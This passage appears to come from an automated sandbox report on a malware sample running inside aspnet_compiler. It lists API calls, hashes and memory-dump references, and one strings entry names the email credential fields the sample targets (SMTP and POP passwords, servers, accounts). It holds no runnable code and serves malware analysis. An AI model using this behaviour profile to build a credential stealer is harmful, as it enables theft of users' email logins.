                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    APIs
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    APIs
                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    APIs
                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • VariantInit.OLEAUT32(?), ref: 004043C4
                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                    • VariantInit.OLEAUT32(?), ref: 00404414
                    • SysAllocString.OLEAUT32(?), ref: 00404419
                    • VariantInit.OLEAUT32(?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1312198159-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                    • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                    • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                    • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                    • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                    • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                    • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64